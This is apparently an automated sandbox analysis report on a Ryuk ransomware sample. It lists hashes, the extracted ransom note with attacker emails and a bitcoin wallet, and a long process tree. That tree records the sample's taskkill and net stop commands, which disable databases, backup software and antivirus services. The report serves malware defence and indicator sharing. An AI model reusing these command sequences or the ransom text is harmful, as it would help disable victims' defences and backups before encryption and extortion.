Analysis
-
max time kernel
161s -
max time network
71s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
26-07-2021 12:59
General
-
Target
113af75f13547be184822f1268f984b79f35965a1b1f963d23b50a09741b0aec.sample.exe
-
Size
170KB
-
MD5
29340643ca2e6677c19e1d3bf351d654
-
SHA1
1581fe76e3c96dc33182daafd09c8cf5c17004e0
-
SHA256
113af75f13547be184822f1268f984b79f35965a1b1f963d23b50a09741b0aec
-
SHA512
cf505569f38f7c2d5200faba24bb0713eaba920ebf073d641eb07eda136563258e1ca2c95ff9ea03f3760c77cff9f543c7905a39e00cfe3c89ef79a5cb3305a0
Score
10/10
Malware Config
Extracted
Path
C:\RyukReadMe.txt
Family
ryuk
Ransom Note
Your network has been penetrated.
All files on each host in the network have been encrypted with a strong algorithm.
Backups were either encrypted or deleted or backup disks were formatted.
Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover.
We exclusively have decryption software for your situation
No decryption software is available in the public.
DO NOT RESET OR SHUTDOWN - files may be damaged.
DO NOT RENAME OR MOVE the encrypted and readme files.
DO NOT DELETE readme files.
This may lead to the impossibility of recovery of the certain files.
To get info (decrypt your files) contact us at
BenniDiez@protonmail.com
or
BenniDiez@tutanota.com
BTC wallet:
1KURvApbe1yC7qYxkkkvtdZ7hrNjdp18sQ
Ryuk
No system is safe
Emails
BenniDiez@protonmail.com
BenniDiez@tutanota.com
Wallets
1KURvApbe1yC7qYxkkkvtdZ7hrNjdp18sQ
Signatures
-
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 44 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 45 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\113af75f13547be184822f1268f984b79f35965a1b1f963d23b50a09741b0aec.sample.exe"C:\Users\Admin\AppData\Local\Temp\113af75f13547be184822f1268f984b79f35965a1b1f963d23b50a09741b0aec.sample.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM thunderbird.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Acronis VSS Provider" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Acronis VSS Provider" /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Enterprise Client Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Enterprise Client Service" /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Agent" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Agent" /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos AutoUpdate Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos AutoUpdate Service" /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Clean Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Clean Service" /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Device Control Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Device Control Service" /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos File Scanner Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos File Scanner Service" /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Health Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Health Service" /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos MCS Agent" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos MCS Agent" /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos MCS Client" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos MCS Client" /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Message Router" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Message Router" /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos System Protection Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos System Protection Service" /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Safestore Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Safestore Service" /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Web Control Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Web Control Service" /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "SQLsafe Backup Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLsafe Backup Service" /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "SQLsafe Filter Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLsafe Filter Service" /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Symantec System Recovery" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec System Recovery" /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Veeam Backup Catalog Data Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop Antivirus /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Antivirus /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop AcrSch2Svc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ARSM /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ARSM /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop AcronisAgent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecAgentAccelerator /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecAgentBrowser /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecDeviceMediaService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecJobEngine /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecManagementService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecRPCService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecVSSProvider /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop bedbg /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop bedbg /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EPSecurityService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EraserSvc11710 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop IISAdmin /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop IISAdmin /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop FA_Scheduler /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EsgShKernel /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EPUpdateService /y2⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop DCAgent /y2⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop IMAP4Svc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop IMAP4Svc /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop macmnsvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop macmnsvc /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop masvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop masvc /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McAfeeEngineService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McAfeeFrameworkMcAfeeFramework /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McAfeeFramework /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McShield /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McShield /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McTaskManager /y2⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MBEndpointAgent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MBAMService /y2⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop mfemms /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfemms /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop mfevtp /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfevtp /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MMS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MMS /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MsDtsServer /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MsDtsServer100 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MsDtsServer110 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeES /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop mozyprobackup /y2⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeIS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeMTA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McTaskManager /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeSRS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSOLAP$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeSA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSOLAP$SYSTEM_BGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSOLAP$TPS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeMGMT /y2⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$BKUPEXEC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$ECWDB2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$PRACTICEMGT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$PRACTTICEBGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSOLAP$TPSAMA /y2⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$PROFXENGAGEMENT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SBSMONITORING /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SHAREPOINT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$TPS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SYSTEM_BGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2012 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SBSMONITORING /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SHAREPOINT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$TPS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLSERVER /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLServerADHelper100 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLServerOLAPService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MySQL80 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL80 /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MySQL57 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL57 /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ntrtscan /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ntrtscan /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SmcService /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop OracleClientCache80 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop PDVFSService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop POP3Svc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop POP3Svc /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer$SYSTEM_BGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y3⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer$TPS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y3⤵
-
